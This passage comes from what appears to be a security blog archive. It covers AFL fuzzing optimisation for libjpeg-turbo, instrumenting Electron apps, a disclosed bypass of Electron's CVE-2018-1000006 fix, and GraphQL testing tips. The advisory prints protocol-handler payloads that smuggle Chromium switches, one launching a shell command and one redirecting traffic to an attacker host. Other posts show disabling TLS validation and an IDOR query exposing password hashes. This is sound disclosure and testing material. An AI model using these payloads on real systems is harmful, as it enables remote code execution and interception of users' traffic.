       Fuzzers alive : 256
      Total run time : 1 days, 0 hours
         Total execs : 6 million
    Cumulative speed : 18363 execs/sec
       Pending paths : 1 faves, 112903 total
  Pending per fuzzer : 0 faves, 441 total (on average)
       Crashes found : 0 locally unique

But it worked

Well that gave us a 4.5x speedup! Look at that CPU utilization!

Optimizing our target for maximum CPU time

We’re now using 100% of all cores. If you’re no htop master you might not know that the red means kernel time on the bars. This means that (eyeballing it) we’re spending about 50% of the CPU time in the kernel. Any time in the kernel is time not spent fuzzing JPEGs. At this point we’ve got AFL doing everything it can, but we’re gonna have to get more creative with our target.

So this is telling us we must be able to find at least a 2x speedup on this target, moving our goal to 40k execs/sec. It’s possible kernel usage is unavoidable, but for something like libjpeg-turbo it would be unreasonable to spend any large amount of time in the kernel anyways. Let’s use everything AFL gives us by using AFL persistent mode. This effectively allows you to run multiple fuzz cases in a single instance of the program rather than reverting program state back every fuzz case via clone() or fork(). This can reduce that kernel overhead we’re worried about.

Let’s set up the persistent mode environment by building afl-clang-fast.

pleb@debphi:~/blogging$ cd afl-2.52b/llvm_mode/
pleb@debphi:~/blogging/afl-2.52b/llvm_mode$ make -j8
[*] Checking for working 'llvm-config'...
[*] Checking for working 'clang'...
[*] Checking for '../afl-showmap'...
[+] All set and ready to build.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  afl-clang-fast.c -o ../afl-clang-fast
ln -sf afl-clang-fast ../afl-clang-fast++
clang++ `llvm-config --cxxflags` -fno-rtti -fpic -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DVERSION=\"2.52b\" -Wno-variadic-macros -shared afl-llvm-pass.so.cc -o ../afl-llvm-pass.so `llvm-config --ldflags`
warning: unknown warning option '-Wno-maybe-uninitialized'; did you mean '-Wno-uninitialized'? [-Wunknown-warning-option]
1 warning generated.
clang -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  -fPIC -c afl-llvm-rt.o.c -o ../afl-llvm-rt.o
[*] Building 32-bit variant of the runtime (-m32)... success!
[*] Building 64-bit variant of the runtime (-m64)... success!
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN AFL_INST_RATIO; AFL_QUIET=1 AFL_PATH=. AFL_CC=clang ../afl-clang-fast -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DBIN_PATH=\"/usr/local/bin\" -DVERSION=\"2.52b\"  ../test-instr.c -o test-instr
echo 0 | ../afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ../afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] All done! You can now use '../afl-clang-fast' to compile programs.

Now we have an afl-clang-fast binary in the afl-2.52b folder. Let’s rebuild libjpeg-turbo using this

pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target jpegtran-static
afl-clang-fast 2.52b by <[email protected]>
[100%] Built target jpegtran

So, libjpeg-turbo is a library. Meaning it’s designed to be used from other programs. It’s also one of the most popular libraries for image compression, so surely it’s relatively easy to use. Let’s quickly write up a bare-bones application that loads an image from a provided argument:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include "jpeglib.h"
#include <setjmp.h>

struct my_error_mgr {
  struct jpeg_error_mgr pub;    /* "public" fields */
  jmp_buf setjmp_buffer;        /* for return to caller */
};

typedef struct my_error_mgr * my_error_ptr;

// Longjmp out on errors
METHODDEF(void)
my_error_exit(j_common_ptr cinfo)
{
  my_error_ptr myerr = (my_error_ptr) cinfo->err;
  longjmp(myerr->setjmp_buffer, 1);
}


// Eat warnings
METHODDEF(void)
emit_message(j_common_ptr cinfo, int msg_level) {}

GLOBAL(int)
read_JPEG_file (char * filename, unsigned char *filebuf, size_t filebuflen)
{
  struct jpeg_decompress_struct cinfo;
  struct my_error_mgr jerr;
  JSAMPARRAY buffer;            /* Output row buffer */
  int row_stride;               /* physical row width in output buffer */
  int fd;
  ssize_t flen;

  fd = open(filename, O_RDONLY);
  if(fd == -1){
    return 0;
  }

  flen = read(fd, (void*)filebuf, filebuflen);
  close(fd);

  if(flen <= 0){
    return 0;
  }

  cinfo.err = jpeg_std_error(&jerr.pub);
  jerr.pub.error_exit = my_error_exit;
  jerr.pub.emit_message = emit_message;

  /* Establish the setjmp return context for my_error_exit to use. */
  if (setjmp(jerr.setjmp_buffer)) {
    jpeg_destroy_decompress(&cinfo);
    return 0;
  }

  jpeg_create_decompress(&cinfo);
  jpeg_mem_src(&cinfo, filebuf, flen);
  (void) jpeg_read_header(&cinfo, TRUE);
  (void) jpeg_start_decompress(&cinfo);
  row_stride = cinfo.output_width * cinfo.output_components;
  buffer = (*cinfo.mem->alloc_sarray)
                ((j_common_ptr) &cinfo, JPOOL_IMAGE, row_stride, 1);

  while (cinfo.output_scanline < cinfo.output_height) {
    (void) jpeg_read_scanlines(&cinfo, buffer, 1);
  }

  (void) jpeg_finish_decompress(&cinfo);
  jpeg_destroy_decompress(&cinfo);
  return 1;
}

int main(int argc, char *argv[]) {
  void *filebuf = NULL;
  const size_t filebuflen = 32 * 1024;

  if(argc != 2) { fprintf(stderr, "Nice usage noob\n"); return -1; }

  filebuf = malloc(filebuflen);
  if(!filebuf) {
    return -1;
  }

  while(__AFL_LOOP(100000)) {
    read_JPEG_file(argv[1], filebuf, filebuflen);
  }
}

This can be built with:

AFL_PATH=/home/pleb/blogging/afl-2.52b afl-clang-fast -O2 -m32 example.c -I/home/pleb/blogging/buildjpeg -I/home/pleb/blogging/libjpeg-turbo /home/pleb/blogging/buildjpeg/libjpeg.a

You can see the code this was derived from (with more comments) here; I modified it to my specific needs and removed almost all comments to keep the code as small as possible. It’s also relatively simple to read based off the function names.

We made a few changes to the code: we removed all output, so it does not print warnings or errors to the screen, does not save any files, and only parses the input. It then correctly returns up via setjmp()/longjmp() on errors and allows us to quickly move to the next case.

You can see we introduced __AFL_LOOP here. This has special meaning only when running under afl-fuzz: the process uses signals to notify that it is done with a fuzz case and needs a new one. We set this loop to a limit of 100,000 iterations before tearing down the child and restarting. It’s pretty simple and pretty clean. So now hopefully our syscall usage is down. Let’s check that first.

We’re going to run this new single threaded and verify it’s running as persistent:

pleb@debphi:~/blogging/jpeg_fuzz$ afl-fuzz -i /mnt/ram/jpegs/ -o /mnt/ram/outputs/ -- ./a.out @@
...
[+] Persistent mode binary detected. <<< WOO!

Yay

Woo, it’s just a little under 2x faster than the initial single-threaded djpeg (we’re running this one on a ramdisk, but I verified that was not relevant here). It’s running faster simply because we’re doing fewer miscellaneous things in the kernel and in the code itself.

So AFL tells us that it is persistent, but let’s triple check by running strace on the fuzz process:

ps aux | grep "R.*a.out" | grep -v grep | awk '{print "-p " $2}' | xargs strace

It’s a bit ugly, but we strace any actively running a.out task; since it’s crude it might take a few tries to get attached to the right one, but I’m no bash pro.

We can see we get a repeating pattern:

openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---
openat(AT_FDCWD, "/mnt/ram/outputs//.cur_input", O_RDONLY) = 3
read(3, "\377\330\377\340\0\20JFIF\0\1\1\0\0\1\0\1\0\0\377\333\0C\0\5\3\4\4\4\3\5"..., 32768) = 3251
close(3)                                = 0
rt_sigprocmask(SIG_BLOCK, ~[RTMIN RT_1], [], 8) = 0
getpid()                                = 53786
gettid()                                = 53786
tgkill(53786, 53786, SIGSTOP)           = 0
--- SIGSTOP {si_signo=SIGSTOP, si_code=SI_TKILL, si_pid=53786, si_uid=1000} ---
--- stopped by SIGSTOP ---
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCONT {si_signo=SIGCONT, si_code=SI_USER, si_pid=53776, si_uid=1000} ---

We see the openat to open, read to read the file, and close when it’s done parsing. So what is the rt_sigprocmask() and beyond? Well in persistent mode AFL uses this to communicate when fuzz cases are done. You can actually find this code in afl-2.52b/llvm_mode/afl-llvm-rt.o.c. There’s a descriptive comment:

    /* In persistent mode, the child stops itself with SIGSTOP to indicate
       a successful run. In this case, we want to wake it up without forking
       again. */

This means that the rt_sigprocmask() and beyond is out of our control. But other than that we’re doing the bare minimum to read a file by doing open, read, and close. Nothing else. We’re running tens of thousands of fuzz cases in a single instance of this program without having to exit() out and fork()!

Alright! Let’s put it all together and fuzz with this new binary on all cores!

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 1 days, 1 hours
         Total execs : 20 million
    Cumulative speed : 56003 execs/sec
       Pending paths : 1 faves, 122669 total
  Pending per fuzzer : 0 faves, 479 total (on average)
       Crashes found : 0 locally unique

Woo, 56k per second! More than the 2x we were expecting from the custom-written target. And I’ll save you another htop image and just tell you that now only about 8% of CPU time is spent in the kernel. Given we’re doing 7 syscalls per fuzz case, that means we’re doing about 400k syscalls per second, which is still fairly high, but most of those syscalls are due to AFL and not us, so they’re out of our control.

Conclusion

It’s pretty easy to get stuck thinking tools work out of the box. People usually worry about scaling at the level of “if it’s possible” rather than “is it actually doing more work”. It’s important to note that it’s very easy to run 64 instances of a tool and end up getting very little performance gain. In the world of fuzzing you usually should be able to scale linearly with cores, so if you’re only getting 1/2 efficiency it’s probably time to settle in and figure out if it’s in your control or not.

We were able to go from naive single-core AFL usage with 214 execs/sec, to “just run 256 AFLs” at 4k/sec, to doing some optimizations to get us to 56k/sec. All within a few hours of work. It’d be a shame if we would have just taken the 4k/sec and run with it, as we would be wasting almost all of our CPU.

Extra

This is my first blog, so please let me know anything you want more or less of. Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Shoutouts

Shoutouts to @ScottyBauer1 and @marcograss on Twitter for giving me AFL tips and tricks for getting these numbers up

Instrumenting Electron Apps for Security Testing

18 July 2018 at 22:00

Instrumenting Electron-based applications

With the increasing popularity of the Electron Framework, we have created this post to summarize a few techniques which can be used to instrument an Electron-based application, change its behavior, and perform in-depth security assessments.

Electron and processes

The Electron Framework is used to develop multi-platform desktop applications with nothing more than HTML, JavaScript and CSS. It has two core components: Node.js and the libchromiumcontent module from the Chromium project.

In Electron, the main process is the process that runs package.json’s main script. This component has access to Node.js primitives and is responsible for starting other processes. Chromium is used for displaying web pages, which are rendered in separate processes called renderer processes.

Unlike regular browsers where web pages run in a sandboxed environment and do not have access to native system resources, Electron renderers have access to Node.js primitives and allow lower level integration with the underlying operating system. Electron exposes full access to native Node.js APIs, but it also facilitates the use of external Node.js NPM modules.

As you might have guessed from recent public security vulnerabilities, the security implications are substantial since JavaScript code can access the filesystem, user shell, and many more primitives. The inherent security risks increase with the additional power granted to application code. For instance, displaying arbitrary content from untrusted sources inside a non-isolated renderer is a severe security risk. You can read more about Electron Security, hardening and vulnerabilities prevention in the official Security Recommendations document.

Unpacking the ASAR archive

The first thing to do to inspect the source code of an Electron-based application is to unpack the application bundle (.asar file). ASAR archives are a simple tar-like format that concatenates files into a single one.

First locate the main ASAR archive of our app, usually named core.asar or app.asar.

Once we have this file we can proceed with installing the asar utility: npm install -g asar

and extract the whole archive: asar extract core.asar destinationfolder

In its simplest form, an Electron application includes three files: index.js, index.html and package.json.

Our first target to inspect is the package.json file, as it holds the path of the file responsible for the “entry point” of our application:

{
  "name": "Example App",
  "description": "Core App",
  "main": "app/index.js",
  "private": true
}

In our example the entry point is the file called index.js located within the app folder, which will be executed as the main process. If not specified, index.js is the default main file. The file index.html and other web resources are used in renderer processes to display actual content to the user. A new renderer process is created for every browserWindow instantiated in the main process.

In order to be able to follow functions and methods in our favorite IDE, it is recommended to resolve the dependencies of our app:

npm install

We should also install Devtron, a tool (built on top of the Chrome Developer Tools) to inspect, monitor and debug our Electron app. For Devtron to work, nodeIntegration must be on.

npm install --save-dev devtron

Then, run the following from the Console tab of the Developer Tools

require('devtron').install()

Dealing with obfuscated JavaScript

Whenever the application is neither minified nor obfuscated, we can easily inspect the code.

'use strict';

Object.defineProperty(exports, "__esModule", {
  value: true
});
exports.startup = startup;
exports.handleSingleInstance = handleSingleInstance;
exports.setMainWindowVisible = setMainWindowVisible;

var _require = require('electron'),
    Menu = _require.Menu;

var mainScreen = void 0;
function startup(bootstrapModules) {
[ -- cut -- ]

In case of obfuscation, there are no silver bullets for unfolding heavily manipulated JavaScript code. In these situations, a combination of automatic tools and manual reverse engineering is required to get back to the original source.

Take this horrendous piece of JS as an example:

eval(function(c,d,e,f,g,h){g=function(i){return(i<d?'':g(parseInt(i/d)))+((i=i%d)>0x23?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](i+0x1d):i['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x24));};while(e--){if(f[e]){c=c['\x72\x65\x70\x6c\x61\x63\x65'](new RegExp('\x5c\x62'+g(e)+'\x5c\x62','\x67'),f[e]);}}return c;}('\x62\x20\x35\x3d\x5b\x22\x5c\x6f\x5c\x38\x5c\x70\x5c\x73\x5c\x34\x5c\x63\x5c\x63\x5c\x37\x22\x2c\x22\x5c\x72\x5c\x34\x5c\x64\x5c\x74\x5c\x37\x5c\x67\x5c\x6d\x5c\x64\x22\x2c\x22\x5c\x75\x5c\x34\x5c\x66\x5c\x66\x5c\x38\x5c\x71\x5c\x34\x5c\x36\x5c\x6c\x5c\x36\x22\x2c\x22\x5c\x6e\x5c\x37\x5c\x67\x5c\x36\x5c\x38\x5c\x77\x5c\x34\x5c\x36\x5c\x42\x5c\x34\x5c\x63\x5c\x43\x5c\x37\x5c\x76\x5c\x34\x5c\x41\x22\x5d\x3b\x39\x20\x6b\x28\x65\x29\x7b\x62\x20\x61\x3d\x30\x3b\x6a\x5b\x35\x5b\x30\x5d\x5d\x3d\x39\x28\x68\x29\x7b\x61\x2b\x2b\x3b\x78\x28\x65\x2b\x68\x29\x7d\x3b\x6a\x5b\x35\x5b\x31\x5d\x5d\x3d\x39\x28\x29\x7b\x79\x20\x61\x7d\x7d\x62\x20\x69\x3d\x7a\x20\x6b\x28\x35\x5b\x32\x5d\x29\x3b\x69\x2e\x44\x28\x35\x5b\x33\x5d\x29',0x28,0x28,'\x7c\x7c\x7c\x7c\x78\x36\x35\x7c\x5f\x30\x7c\x78\x32\x30\x7c\x78\x36\x46\x7c\x78\x36\x31\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x5f\x31\x7c\x76\x61\x72\x7c\x78\x36\x43\x7c\x78\x37\x34\x7c\x5f\x32\x7c\x78\x37\x33\x7c\x78\x37\x35\x7c\x5f\x33\x7c\x6f\x62\x6a\x7c\x74\x68\x69\x73\x7c\x4e\x65\x77\x4f\x62\x6a\x65\x63\x74\x7c\x78\x33\x41\x7c\x78\x36\x45\x7c\x78\x35\x39\x7c\x78\x35\x33\x7c\x78\x37\x39\x7c\x78\x36\x37\x7c\x78\x34\x37\x7c\x78\x34\x38\x7c\x78\x34\x33\x7c\x78\x34\x44\x7c\x78\x36\x44\x7c\x78\x37\x32\x7c\x61\x6c\x65\x72\x74\x7c\x72\x65\x74\x75\x72\x6e\x7c\x6e\x65\x77\x7c\x78\x32\x45\x7c\x78\x37\x37\x7c\x78\x36\x33\x7c\x53\x61\x79\x48\x65\x6c\x6c\x6f'['\x73\x70\x6c\x69\x74']('\x7c')));

It can be manually turned into:

eval(function (c, d, e, f, g, h) {
    g = function (i) {
        return (i < d ? '' : g(parseInt(i / d))) + ((i = i % d) > 35 ? String['fromCharCode'](i + 29) : i['toString'](36));
    };
    while (e--) {
        if (f[e]) {
            c = c['replace'](new RegExp('\\b' + g(e) + '\\b', 'g'), f[e]);
        }
    }
    return c;
}('b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d","\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])', 40, 40, '||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello'['split']('|')));

Then, it can be passed to JStillery, JS Nice and other similar tools in order to get back a human readable version.

'use strict';
var _0 = ["SayHello", "GetCount", "Message : ", "You are welcome."];
function NewObject(contentsOfMyTextFile) {
  var _1 = 0;
  this[_0[0]] = function(theLibrary) {
    _1++;
    alert(contentsOfMyTextFile + theLibrary);
  };
  this[_0[1]] = function() {
    return _1;
  };
}
var obj = new NewObject(_0[2]);
obj.SayHello(_0[3]);

Enabling the developer tools in the renderer process

During testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and <webview> tags.

Electron’s main process can use the BrowserWindow API to instantiate a new renderer.

In the example below, we are creating a new BrowserWindow instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:

/app/mainScreen.js

var winOptions = {
    title: 'Example App',
    backgroundColor: '#ffffff',
    width: DEFAULT_WIDTH,
    height: DEFAULT_HEIGHT,
    minWidth: MIN_WIDTH,
    minHeight: MIN_HEIGHT,
    transparent: false,
    frame: false,
    resizable: true,
    show: isVisible,
    webPreferences: {
      nodeIntegration: false,
      preload: _path2.default.join(__dirname, 'preload.js')
    }
  };

[ -- cut -- ]

mainWindow = new _electron.BrowserWindow(winOptions);
  winId = win.id;

//|--> HERE we can hook and add the Developers Tools <--|
win.webContents.openDevTools({ mode: 'bottom' })
win.setMenuBarVisibility(true);

If everything worked fine, we should have the Developer Tools enabled for the main UI screen.

From the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. webview tags).

window.document.getElementsByTagName("webview")[0].openDevTools()

While reading the code above, have you noticed the webPreference options?

WebPreferences options are basically settings for the renderer process (security features such as nodeIntegration or preload scripts), while the surrounding BrowserWindow options control things like window size, appearance and colors. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the show property of the BrowserWindow options:

BrowserWindow({show: true})

Adding debugging statements

During instrumentation, it is useful to include debugging code such as

console.log("\n--------------- Debug --------------------\n")
console.log(process.type)
console.log(process.pid)
console.log(process.argv)
console.log("\n--------------- Debug --------------------\n")

Debugging the main process

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the --inspect or --inspect-brk switch.

Use one of the following command line switches to enable debugging of the main process:

--inspect=[port] Electron will listen for V8 inspector protocol messages on the specified port; an external debugger will need to connect on this port. The default port is 5858.

--inspect-brk=[port] Like --inspect but pauses execution on the first line of JavaScript.

Usage: electron --inspect=5858 your-app

You can now connect Chrome by visiting chrome://inspect and analyze the launched Electron app present there.

Intercepting HTTP(s) traffic

Chromium supports system proxy settings on all platforms, so set up a proxy and then add Burp’s CA certificate as usual.

You can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app.

--proxy-server=address:port

Or, programmatically with these lines in the main app:

const {app} = require('electron') 
app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080')

For Node, use transparent proxying by either changing /etc/hosts or overriding configs:

npm config set proxy http://localhost:8080
npm config set https-proxy http://localhost:8081

In case you need to revert the proxy settings, use:

npm config rm proxy
npm config rm https-proxy

However, you need to disable TLS validation with the following code within the application under testing:

process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";

Outro

Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

@voidsec @lucacarettoni

Read more

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

23 May 2018 at 22:00

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via [email protected]) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006

On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd /c start calc" --foobar='
</script>

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters, which allowed a bypass with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd /c start calc" --foobar='
</script> 

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}

As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments like Electron:

  • The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
  • The blacklist is implemented using a binary search. Blacklisted flags could be missed by the check if the list is not properly sorted (see the sketch below)
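
As a quick illustration of the second point (using Python’s bisect as a stand-in for the C++ std::binary_search, with a made-up flag list), a binary search over an improperly sorted list silently misses entries:

# Binary search only works on sorted data; an unsorted blacklist
# silently fails to match some of its own entries.
import bisect

blacklist = ["inspect", "gpu-launcher", "host-rules"]   # NOT in sorted order

def is_blacklisted(flag):
    i = bisect.bisect_left(blacklist, flag)
    return i < len(blacklist) and blacklist[i] == flag

print(is_blacklisted("host-rules"))     # True: happens to be found
print(is_blacklisted("gpu-launcher"))   # False: missed because the list is unsorted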

Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchromiumcontent. This immediately stuck out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform a completely transparent Man-In-The-Middle attack:

<!doctype html>
<script>
 window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can also be abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron’s update feature, along with other critical functions, is not affected by this vulnerability.

Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

@ikkisoft

@day6reak

GraphQL - Security Overview and Testing Tips

16 May 2018 at 22:00

With the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes.

What is GraphQL?

GraphQL is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST APIs.

Even if you don’t see any GraphQL out there, it is likely you’re already using it, since it runs behind big tech players like Facebook, GitHub, Pinterest, Twitter, HackerOne and many more.

A few key points on this technology

  • GraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. Queries always return predictable results.

  • While typical REST APIs require loading from multiple URLs, GraphQL APIs get all the data your app needs in a single request.

  • GraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of all your data from a single endpoint.

  • GraphQL is strongly typed to ensure that applications only ask for what’s possible and to provide clear and helpful errors.

  • New fields and types can be added to the GraphQL API without impacting existing queries. Aging fields can be deprecated and hidden from tools.

Before we start diving into the GraphQL security landscape, here is a brief recap on how it works. The official documentation is well written and was really helpful.

A GraphQL query looks like this:

Basic GraphQL Query

query{
	user{
		id
		email
		firstName
		lastName
	}
}

While the response is JSON:

Basic GraphQL Response

{
	"data": {
		"user": {
			"id": "1",
			"email": "[email protected]",
			"firstName": "Paolo",
			"lastName": "Stagno"
		}
	}
}

Security Testing Tips

Since Burp Suite does not understand GraphQL syntax well, I recommend using graphql-ide, an Electron-based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small Python script, GraphQL_Introspection.py, that enumerates a GraphQL endpoint (with introspection) in order to pull out its documentation. The script is useful for examining the GraphQL schema, looking for information leakage, hidden data and fields that are not intended to be accessible.

The tool will generate an HTML report similar to the following:

Python Script pulling data from a GraphQL endpoint

Introspection is used to ask a GraphQL schema for information about what queries, types and so on it supports.

As a pentester, I would recommend looking for requests issued to “/graphql” or “/graphql.php”, since those are usual GraphQL endpoint names; you should also search for “/graphiql”, “/graphql/console/”, online GraphQL IDEs to interact with the backend, and “/graphql.php?debug=1” (debugging mode with additional error reporting), since they may be left open by developers.

When testing an application, verify whether requests can be issued without the usual authorization token header:

GraphQL Bearer Authorization Header Example

Since the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:

“However, for a production codebase, delegate authorization logic to the business logic layer”.

Things may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server.

When building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response demonstrates that we can fetch data for any users of the platform (cycling through the ID parameter), while simultaneously dumping password hashes:

Query

query{
	user(id: 165274){
		id
		email
		firstName
		lastName
		password
	}
}

Response

{
	"data": {
		"user": {
			"id": "165274",
			"email": "[email protected]",
			"firstName": "John",
			"lastName": "Doe"
			"password": "5F4DCC3B5AA765D61D8327DEB882CF99"
		}
	}
}

Another thing that you will have to check is related to information disclosure when trying to perform illegal queries:

Information Disclosure

{
	"errors": [
		{
			"message": "Invalid ID.",
			"locations": [
				{
					"line": 2,
					"column": 12
				}
			],
			"Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"
		}
	]
}

Even though GraphQL is strongly typed, SQL/NoSQL injections are still possible since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database; variables that are not properly sanitized lead to plain old SQL injection. In the case of MongoDB, NoSQL injection may not be that simple since we cannot “juggle” types (e.g. turning a string into an array; see PHP MongoDB Injection).

GraphQL SQL Injection

